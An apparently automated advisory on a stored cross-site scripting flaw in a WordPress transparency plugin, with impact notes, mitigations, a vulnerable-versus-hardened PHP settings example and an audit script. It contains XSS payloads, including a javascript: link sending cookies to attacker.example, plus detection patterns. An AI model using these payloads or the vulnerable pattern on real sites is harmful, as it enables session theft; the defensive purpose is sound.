
CVE-2025-5083: CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in milmor Amministrazione Trasparente

Severity: Medium
Tags: Vulnerability, CVE-2025-5083, CWE-79
Published: Sun Aug 31 2025 (08/31/2025, 04:25:48 UTC)
Source: CVE Database V5
Vendor/Project: milmor
Product: Amministrazione Trasparente

Description

The Amministrazione Trasparente plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 9.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

AI-Powered Analysis

Last updated: 08/31/2025, 04:47:46 UTC

Technical Analysis

CVE-2025-5083 is a medium-severity stored Cross-Site Scripting (XSS) vulnerability in the Amministrazione Trasparente WordPress plugin by milmor, affecting all versions up to and including 9.0. The root cause (CWE-79) is that one or more admin settings are stored without sufficient sanitization and rendered without output escaping, so an authenticated user with administrator-level permissions or above can save HTML containing script, which then executes in the browser of anyone who views a page on which that setting is rendered.

The capability caveat in the description is what makes this a vulnerability rather than expected behaviour. On a single-site WordPress installation administrators hold the unfiltered_html capability and can already publish arbitrary HTML and script through normal content, so an unescaped settings field gives them nothing new. On multisite only super administrators hold unfiltered_html, and on any installation the capability can be removed with the DISALLOW_UNFILTERED_HTML constant; in those configurations an administrator is not supposed to be able to inject script, and a settings field that stores and echoes raw markup bypasses that boundary. The plugin is therefore affected on multisite installations and on any installation where unfiltered_html has been disabled.

The CVSS 3.1 base score is 5.5 (medium), consistent with the vector AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N: network attack vector, low complexity, high privileges (administrator), no user interaction, low confidentiality and integrity impact, and no availability impact. Scope is changed because the vulnerable component (the plugin running on the server) differs from the impacted component (the browsers of users who load the injected page). No exploits are reported in the wild and no patch had been linked at the time of this analysis. Depending on the payload, an attacker could hijack other users' sessions, perform actions in their browsers, deface the page, or redirect visitors to malicious sites. Because exploitation requires an administrator account, the realistic threat is a compromised or malicious administrator, in particular a site administrator on a multisite network who is not a super administrator.
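The settings-page pattern behind an administrator-level stored XSS, beside its hardened form, as an added example (this is not code from the Amministrazione Trasparente plugin; the option name, field name and function names are hypothetical, and the `$options` array stands in for get_option()/update_option()). Outside WordPress the escaping helpers are shimmed so the file runs with plain `php`; inside WordPress the real esc_html() and sanitize_text_field() are used.

```php
<?php
// Added example, not the plugin's code: vulnerable vs. hardened handling of a plain-text
// admin setting. Hypothetical names throughout; $options stands in for the wp_options row.

if (!function_exists('esc_html')) {
    // Stand-ins for running without WordPress loaded. Core's esc_html() also repairs invalid
    // UTF-8 and avoids double-encoding existing entities; htmlspecialchars() is close enough here.
    function esc_html($text): string {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
    function sanitize_text_field($str): string {
        return trim(strip_tags((string) $str));
    }
}

const AT_DEMO_OPTION = 'at_demo_footer_note'; // hypothetical plain-text setting

// Vulnerable pattern: the submitted value is stored verbatim and echoed verbatim. On a single
// site an administrator holds unfiltered_html and could place script in content anyway; on
// multisite, or with DISALLOW_UNFILTERED_HTML set, this field hands back a capability that
// WordPress deliberately withheld.
function at_vulnerable_save(array $post, array &$options): void {
    $options[AT_DEMO_OPTION] = $post['at_footer_note'] ?? '';   // no sanitization on save
}
function at_vulnerable_render(array $options): string {
    return '<p class="at-footer">' . ($options[AT_DEMO_OPTION] ?? '') . '</p>';   // no escaping
}

// Hardened pattern: sanitize on save so markup never reaches the database, and escape on
// output regardless, so a value written by some other path is still inert in the page.
function at_hardened_save(array $post, array &$options): void {
    $options[AT_DEMO_OPTION] = sanitize_text_field($post['at_footer_note'] ?? '');
}
function at_hardened_render(array $options): string {
    return '<p class="at-footer">' . esc_html($options[AT_DEMO_OPTION] ?? '') . '</p>';
}

// Constructed payload of the kind the advisory describes (no real exploit is published).
$payload = ['at_footer_note' => 'Ultimo aggiornamento <img src=x onerror="alert(document.cookie)">'];

$opts = [];
at_vulnerable_save($payload, $opts);
echo at_vulnerable_render($opts), PHP_EOL;   // the img tag reaches every visitor's browser intact

$opts = [];
at_hardened_save($payload, $opts);
echo at_hardened_render($opts), PHP_EOL;     // the tag is stripped on save and the rest is entity-encoded on output
```

In a real plugin the save side belongs in the Settings API: register_setting('at_settings', AT_DEMO_OPTION, ['type' => 'string', 'sanitize_callback' => 'sanitize_text_field']) applies the sanitizer on every write through the settings form. For a field that must accept limited HTML, store current_user_can('unfiltered_html') ? $raw : wp_kses_post($raw) and render it through wp_kses_post(), which is the rule WordPress core applies to post content and the reason the advisory's scope is tied to that capability.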

Potential Impact

For European organizations running the Amministrazione Trasparente plugin on a WordPress multisite network, or on any installation where unfiltered_html has been disabled, this vulnerability poses a risk of persistent XSS that can compromise the confidentiality and integrity of user sessions and data. The plugin exists to publish the transparency section that Italian public administrations are required to maintain, so affected sites are often public sector or municipal portals in Italy, and the injected script runs in the browsers of citizens consulting those pages as well as of other administrators. Attackers with admin access could use it for session hijacking, unauthorized actions performed with another administrator's session, or the dissemination of misleading content on an official transparency page. The requirement for administrator-level privileges makes direct external exploitation unlikely, but it raises the stakes of insider threats and of compromised administrator accounts. Single-site installations whose administrators retain unfiltered_html fall outside the advisory's scope, because such an administrator can already publish script through normal content; single-site installations hardened with DISALLOW_UNFILTERED_HTML are affected, as are the large organizations and municipalities that run multisite networks with per-site administrators. A compromise of a public transparency platform would undermine trust and cause reputational damage, and could carry obligations under GDPR if personal data is exposed. The cross-site scripting could also serve as a stepping stone for further attacks within the affected network, for example by driving an administrator's browser to create additional accounts.

Mitigation Recommendations

1. Restrict administrator access to trusted personnel only and enforce strong authentication, in particular multi-factor authentication (MFA), to reduce the risk of a compromised administrator account, which is the precondition for exploitation.
2. Audit WordPress installations to identify which ones run the Amministrazione Trasparente plugin on a multisite network, or with unfiltered_html disabled (DISALLOW_UNFILTERED_HTML set in wp-config.php). Installations whose administrators hold unfiltered_html are outside the advisory's scope.
3. Until an official patch is released, either deactivate the plugin on affected installations or, if carrying a local patch is feasible, sanitize the affected settings on save (a sanitize_callback on register_setting(), or wp_kses_post() for fields that must accept HTML) and escape them on output with esc_html() or esc_attr().
4. Review the plugin's stored settings in wp_options for script tags, inline event handlers and javascript: URLs, and monitor administrative activity logs for settings changes by unexpected accounts or at unexpected times.
5. Deploy a Content Security Policy that disallows inline scripts (no 'unsafe-inline' in script-src, with nonces or hashes for the site's own inline scripts). A policy that permits 'unsafe-inline' provides no protection against this class of payload; because WordPress core, themes and plugins commonly rely on inline scripts, roll the policy out in report-only mode first.
6. Update WordPress core and plugins to the latest versions as soon as a fixed release of the plugin becomes available.
7. Conduct security awareness training for administrators to recognize and prevent social engineering attacks that could lead to credential compromise.
8. Consider Web Application Firewall (WAF) rules that block script tags and event-handler attributes in POST bodies to the plugin's settings pages. Expect false positives on settings that legitimately accept HTML, and note that a WAF does not clean values that are already stored.
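An offline audit of stored plugin settings for script-bearing markup, as an added example in support of steps 2 and 4 above (this is not code from the plugin or the page; the option names and values are constructed, and in a live site the array would be populated from wp_options).

```php
<?php
// Added example, not the plugin's code: scan stored option values for markup that has no
// business in an administrator-entered text field. Sample data below is constructed.

/**
 * Return the indicators that make a stored value look script-bearing, keyed by name.
 * Tuned for text settings: any script tag, inline event handler, javascript: or
 * data:text/html URL, or an embedding element is suspicious. The raw stored value is
 * scanned; entity-encoded markup such as &lt;script&gt; is inert unless something decodes it,
 * so it is deliberately not flagged.
 */
function at_script_indicators(string $value): array {
    $patterns = [
        'script_tag'     => '/<\s*script\b/i',
        'event_handler'  => '/\bon[a-z]+\s*=/i',
        'javascript_url' => '/javascript\s*:/i',
        'data_html_url'  => '/data\s*:\s*text\/html/i',
        'embedding_tag'  => '/<\s*(svg|iframe|object|embed)\b/i',
    ];
    $hits = [];
    foreach ($patterns as $name => $re) {
        if (preg_match($re, $value, $m)) {
            $hits[$name] = $m[0];
        }
    }
    return $hits;
}

/**
 * Walk a set of options (name => value; values may be nested arrays, as serialized
 * plugin settings usually are) and return flagged paths with their indicators.
 */
function at_audit_options(array $options, string $prefix = ''): array {
    $findings = [];
    foreach ($options as $key => $value) {
        $path = $prefix === '' ? (string) $key : $prefix . '.' . $key;
        if (is_array($value)) {
            $findings += at_audit_options($value, $path);
            continue;
        }
        if (!is_string($value)) {
            continue;
        }
        $hits = at_script_indicators($value);
        if ($hits !== []) {
            $findings[$path] = $hits;
        }
    }
    return $findings;
}

// Constructed sample of what get_option() might return for a few hypothetical settings.
$sample = [
    'at_demo_title'   => 'Amministrazione Trasparente',
    'at_demo_footer'  => 'Aggiornato al 2025 &lt;b&gt;ok&lt;/b&gt;',   // escaped, inert
    'at_demo_contact' => '<a href="javascript:fetch(\'https://attacker.example/?c=\'+document.cookie)">Contatti</a>',
    'at_demo_layout'  => ['columns' => '2', 'note' => '<img src=x onerror=alert(1)>'],
];

foreach (at_audit_options($sample) as $path => $hits) {
    printf("%s: %s\n", $path, implode(', ', array_keys($hits)));
}
```

Every hit needs a human decision: a setting that legitimately accepts HTML may match on purpose, while a match on a field documented as plain text is either a bug in the plugin's sanitization or evidence that someone has already used it. Keep the flagged rows and the account that last changed them together with the admin activity log when escalating.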


Technical Details

Data Version
5.1
Assigner Short Name
Wordfence
Date Reserved
2025-05-22T08:46:01.922Z
Cvss Version
3.1
State
PUBLISHED

Threat ID: 68b3d06cad5a09ad00aea88a

Added to database: 8/31/2025, 4:32:44 AM

Last enriched: 8/31/2025, 4:47:46 AM

Last updated: 9/1/2025, 9:56:10 AM
